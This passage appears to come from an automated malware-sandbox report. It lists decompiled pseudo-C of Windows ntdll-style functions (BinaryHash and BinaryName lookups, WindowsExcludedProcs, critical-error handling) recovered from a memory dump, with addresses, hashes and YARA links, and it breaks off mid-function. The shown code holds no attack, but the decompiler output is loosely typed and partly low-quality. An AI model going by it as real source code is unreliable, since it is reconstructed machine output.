				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x49ad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E048F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04933706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E048FFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04933540;
						E048FFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0490DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04940C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E048F97C0();
					}
					return E048FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04933971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04933884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E048FFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E048F9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04933787(_a4,  &_v352, _t80);
						}
					}
					L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E048F95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                            0x04933552
                                                            0x0493355a
                                                            0x0493355d
                                                            0x04933566
                                                            0x04933567
                                                            0x0493357e
                                                            0x0493358f
                                                            0x049335a1
                                                            0x049335a5
                                                            0x0493366b
                                                            0x0493366b
                                                            0x0493366d
                                                            0x04933672
                                                            0x04933679
                                                            0x04933685
                                                            0x0493368d
                                                            0x0493369d
                                                            0x049336a7
                                                            0x049336b8
                                                            0x049336c6
                                                            0x049336c7
                                                            0x049336dc
                                                            0x049336e1
                                                            0x049336e7
                                                            0x049336e9
                                                            0x049336e9
                                                            0x04933703
                                                            0x04933703
                                                            0x049335b5
                                                            0x049335c0
                                                            0x049335c4
                                                            0x00000000
                                                            0x00000000
                                                            0x049335ca
                                                            0x049335d7
                                                            0x049335e2
                                                            0x049335e6
                                                            0x049335e8
                                                            0x049335f5
                                                            0x049335fa
                                                            0x04933603
                                                            0x04933604
                                                            0x04933609
                                                            0x0493360a
                                                            0x04933612
                                                            0x04933613
                                                            0x0493361e
                                                            0x04933622
                                                            0x04933628
                                                            0x0493362f
                                                            0x0493362f
                                                            0x04933636
                                                            0x04933638
                                                            0x0493363b
                                                            0x04933642
                                                            0x04933642
                                                            0x04933636
                                                            0x04933657
                                                            0x04933657
                                                            0x0493365c
                                                            0x04933662
                                                            0x04933669
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: BinaryHash
                                                            • API String ID: 2994545307-2202222882
                                                            • Opcode ID: 6a5be56b38de24d8b40a2defb52cd79fbe5c66e3890590ad4e8706728a4420c5
                                                            • Instruction ID: 12659fa1d1fcf722134afe5b1c3b637eca6bd052daec4593d0305476cc946306
                                                            • Opcode Fuzzy Hash: 6a5be56b38de24d8b40a2defb52cd79fbe5c66e3890590ad4e8706728a4420c5
                                                            • Instruction Fuzzy Hash: 254144B1D4052C9FEB21DA54CC81FDEB77CAB45719F0046A5EB09AB240DB70AE888F95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04933884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E04933884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E048F9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L048D4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E048F9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                            0x04933893
                                                            0x04933896
                                                            0x04933899
                                                            0x0493389f
                                                            0x049338a0
                                                            0x049338a4
                                                            0x049338a9
                                                            0x049338ac
                                                            0x049338ad
                                                            0x049338ae
                                                            0x049338af
                                                            0x049338b1
                                                            0x049338b4
                                                            0x049338bb
                                                            0x049338bc
                                                            0x049338bd
                                                            0x049338c4
                                                            0x049338c8
                                                            0x049338ca
                                                            0x049338ca
                                                            0x049338d5
                                                            0x0493393e
                                                            0x04933940
                                                            0x04933942
                                                            0x04933952
                                                            0x04933954
                                                            0x04933961
                                                            0x04933961
                                                            0x04933967
                                                            0x0493396e
                                                            0x0493396e
                                                            0x04933947
                                                            0x0493394c
                                                            0x00000000
                                                            0x0493394c
                                                            0x049338ea
                                                            0x049338ee
                                                            0x049338f8
                                                            0x049338f9
                                                            0x049338ff
                                                            0x04933900
                                                            0x04933902
                                                            0x04933903
                                                            0x0493390b
                                                            0x0493390f
                                                            0x04933950
                                                            0x00000000
                                                            0x04933950
                                                            0x04933915
                                                            0x0493391d
                                                            0x0493391d
                                                            0x04933922
                                                            0x04933926
                                                            0x00000000
                                                            0x04933928
                                                            0x0493392b
                                                            0x0493392b
                                                            0x04933935
                                                            0x04933937
                                                            0x04933937
                                                            0x00000000
                                                            0x04933935
                                                            0x04933926
                                                            0x049338f0
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: BinaryName
                                                            • API String ID: 2994545307-215506332
                                                            • Opcode ID: e4048101be8414416202c4cb8d19aac25846be81d1d12aa85cc78a533439b531
                                                            • Instruction ID: ab0247071309bd94ab6d2b1cf9ea5ab99c5e3e04b6a238c027ba1196f00be782
                                                            • Opcode Fuzzy Hash: e4048101be8414416202c4cb8d19aac25846be81d1d12aa85cc78a533439b531
                                                            • Instruction Fuzzy Hash: F1310572D41509EFEB35DA58C945E6BF778EB41B24F014639ED04A7650D730BE00CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048ED294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 33%
                                                            			E048ED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x49ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E048D4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E048FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E048F98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E048F95D0();
					L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                            0x048ed29c
                                                            0x048ed2a6
                                                            0x048ed2b1
                                                            0x048ed2b5
                                                            0x048ed2b6
                                                            0x048ed2bc
                                                            0x048ed2bd
                                                            0x048ed2be
                                                            0x048ed2bf
                                                            0x048ed2c2
                                                            0x048ed2c4
                                                            0x048ed2cc
                                                            0x048ed384
                                                            0x048ed34b
                                                            0x048ed34f
                                                            0x048ed350
                                                            0x048ed351
                                                            0x048ed35c
                                                            0x048ed35c
                                                            0x048ed2d6
                                                            0x048ed2da
                                                            0x048ed2e1
                                                            0x048ed361
                                                            0x048ed369
                                                            0x048ed36d
                                                            0x048ed2e3
                                                            0x048ed2e3
                                                            0x048ed2e3
                                                            0x048ed2e5
                                                            0x048ed2ed
                                                            0x048ed2f5
                                                            0x048ed2fa
                                                            0x048ed302
                                                            0x048ed303
                                                            0x048ed30b
                                                            0x048ed30f
                                                            0x048ed313
                                                            0x048ed318
                                                            0x048ed31c
                                                            0x048ed320
                                                            0x048ed379
                                                            0x048ed37d
                                                            0x00000000
                                                            0x00000000
                                                            0x0492affe
                                                            0x0492b001
                                                            0x0492b011
                                                            0x00000000
                                                            0x048ed322
                                                            0x048ed322
                                                            0x048ed330
                                                            0x048ed337
                                                            0x048ed35d
                                                            0x048ed339
                                                            0x048ed33f
                                                            0x048ed38c
                                                            0x048ed38c
                                                            0x048ed33f
                                                            0x048ed349
                                                            0x00000000
                                                            0x048ed349

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: f4c56f67e55442e51a9fcdaa95101c70fe98188e28139c1945c6fbdb2325af08
                                                            • Instruction ID: 9bc94a9028f45650a48a274fd7b2363639c0595c54cc328052bacdddbf66acda
                                                            • Opcode Fuzzy Hash: f4c56f67e55442e51a9fcdaa95101c70fe98188e28139c1945c6fbdb2325af08
                                                            • Instruction Fuzzy Hash: 3F31A8755083059FD311DF1DC98096BBBE8EB85658F000E2EF594C3250E638ED08DB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048C1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E048C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E048FBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E048FA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E048FA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L048D4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                            0x048c1b8f
                                                            0x048c1b9a
                                                            0x048c1b9c
                                                            0x048c1b9e
                                                            0x048c1ba3
                                                            0x04917010
                                                            0x04917010
                                                            0x00000000
                                                            0x048c1ba9
                                                            0x048c1ba9
                                                            0x048c1bae
                                                            0x00000000
                                                            0x048c1bc5
                                                            0x048c1bca
                                                            0x048c1bcf
                                                            0x048c1bd0
                                                            0x048c1bd1
                                                            0x048c1bd2
                                                            0x048c1bd6
                                                            0x048c1bdc
                                                            0x048c1be0
                                                            0x04916ffc
                                                            0x04917000
                                                            0x00000000
                                                            0x04917006
                                                            0x04917009
                                                            0x04917009
                                                            0x048c1be6
                                                            0x048c1bec
                                                            0x048c1c0b
                                                            0x048c1c0b
                                                            0x048c1c0c
                                                            0x048c1c11
                                                            0x048c1c12
                                                            0x048c1c15
                                                            0x048c1c1b
                                                            0x048c1c1f
                                                            0x048c1c31
                                                            0x048c1c33
                                                            0x04917026
                                                            0x04917026
                                                            0x048c1c21
                                                            0x048c1c24
                                                            0x048c1c24
                                                            0x048c1bee
                                                            0x048c1bee
                                                            0x048c1bf2
                                                            0x048c1c3a
                                                            0x048c1bf4
                                                            0x048c1bf4
                                                            0x048c1c05
                                                            0x048c1c05
                                                            0x048c1c09
                                                            0x048c1c3e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048c1c09
                                                            0x048c1bec
                                                            0x048c1be0
                                                            0x048c1bae
                                                            0x048c1c2e

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: WindowsExcludedProcs
                                                            • API String ID: 0-3583428290
                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                            • Instruction ID: 6a962405ec96ef1948b0cdcf8ebed2fa13b0c57155bc94a4632dfd080e319862
                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                            • Instruction Fuzzy Hash: F121483660021CABDB21DE88C884F9BB7ACAF41B54F050A79F905CB201D630FD00ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048DF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                            0x048df71d
                                                            0x048df722
                                                            0x048df726
                                                            0x04924770
                                                            0x048df765
                                                            0x048df769
                                                            0x048df769
                                                            0x048df732
                                                            0x0492477a
                                                            0x00000000
                                                            0x0492477a
                                                            0x048df738
                                                            0x048df73a
                                                            0x048df73c
                                                            0x048df73f
                                                            0x048df746
                                                            0x048df778
                                                            0x048df7a9
                                                            0x048df7a9
                                                            0x048df754
                                                            0x048df75a
                                                            0x048df75d
                                                            0x048df75f
                                                            0x048df761
                                                            0x048df76f
                                                            0x048df771
                                                            0x048df771
                                                            0x048df76f
                                                            0x048df763
                                                            0x00000000
                                                            0x048df763
                                                            0x048df77d
                                                            0x048df7a3
                                                            0x048df7a5
                                                            0x00000000
                                                            0x048df7a5
                                                            0x048df77f
                                                            0x048df782
                                                            0x048df784
                                                            0x048df786
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048df788
                                                            0x048df748
                                                            0x048df74d
                                                            0x048df78d
                                                            0x048df793
                                                            0x048df7b7
                                                            0x048df7bc
                                                            0x00000000
                                                            0x048df7bc
                                                            0x048df798
                                                            0x00000000
                                                            0x00000000
                                                            0x048df79d
                                                            0x048df7b0
                                                            0x00000000
                                                            0x048df7b0
                                                            0x048df79f
                                                            0x00000000
                                                            0x048df74f
                                                            0x048df74f
                                                            0x00000000
                                                            0x048df74f

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Actx
                                                            • API String ID: 0-89312691
                                                            • Opcode ID: cc38cc4935dcbf1916a7e1d0525356e4a496553344d5465a162e93ce34779423
                                                            • Instruction ID: cd02681e4f369293f8a077806c1aa4179e2d4fa469d32881cff26ecbbdf8c8a6
                                                            • Opcode Fuzzy Hash: cc38cc4935dcbf1916a7e1d0525356e4a496553344d5465a162e93ce34779423
                                                            • Instruction Fuzzy Hash: CF11B1353066C68BEB244E1DC5907B67399AB85328F244F2AE767CB390E770F840A340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04968DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E04968DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4990d50);
				E0490D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04945720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0490DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0490DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0490D130(_t34, _t39, _t40);
			}





                                                            0x04968df1
                                                            0x04968df1
                                                            0x04968df1
                                                            0x04968df1
                                                            0x04968df1
                                                            0x04968df1
                                                            0x04968df3
                                                            0x04968df8
                                                            0x04968dfd
                                                            0x04968e00
                                                            0x04968e0e
                                                            0x04968e2a
                                                            0x04968e36
                                                            0x04968e38
                                                            0x04968e3c
                                                            0x04968e46
                                                            0x04968e46
                                                            0x04968e36
                                                            0x04968e50
                                                            0x04968e56
                                                            0x04968e59
                                                            0x04968e5c
                                                            0x04968e60
                                                            0x04968e67
                                                            0x04968e6d
                                                            0x04968e73
                                                            0x04968e74
                                                            0x04968eb1
                                                            0x04968ebd

                                                            Strings
                                                            • Critical error detected %lx, xrefs: 04968E21
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Critical error detected %lx
                                                            • API String ID: 0-802127002
                                                            • Opcode ID: 05f459fc734707f2f99b141114bcfd12d955206d51939efc268e127fcbe493fe
                                                            • Instruction ID: 52d9b13c467f2d4d03c5faed1e9d5fef71925cfc18d25082179520eef1f17f0a
                                                            • Opcode Fuzzy Hash: 05f459fc734707f2f99b141114bcfd12d955206d51939efc268e127fcbe493fe
                                                            • Instruction Fuzzy Hash: E4117975D01348DBEF25EFA885097DCBBB5AB44314F20822DD129AB282C3342602CF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0494FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0494FF60
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                            • API String ID: 0-1911121157
                                                            • Opcode ID: bfe1a9e08144669f6656f5c1855d6f53c58737b30aaef572ddc1c4392c6fa71f
                                                            • Instruction ID: 4549e923bae288763c1c3988400d3e5e0e19f6d765e2f056e9a473d3f313fa66
                                                            • Opcode Fuzzy Hash: bfe1a9e08144669f6656f5c1855d6f53c58737b30aaef572ddc1c4392c6fa71f
                                                            • Instruction Fuzzy Hash: A3110471950144EFEB22DF90C848F987BB1FF88718F1481B4E108672A5C738B950DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04985BA5, Relevance: .6, Instructions: 592COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E04985BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4991178);
				E0490D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04984C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E048FD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04985542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
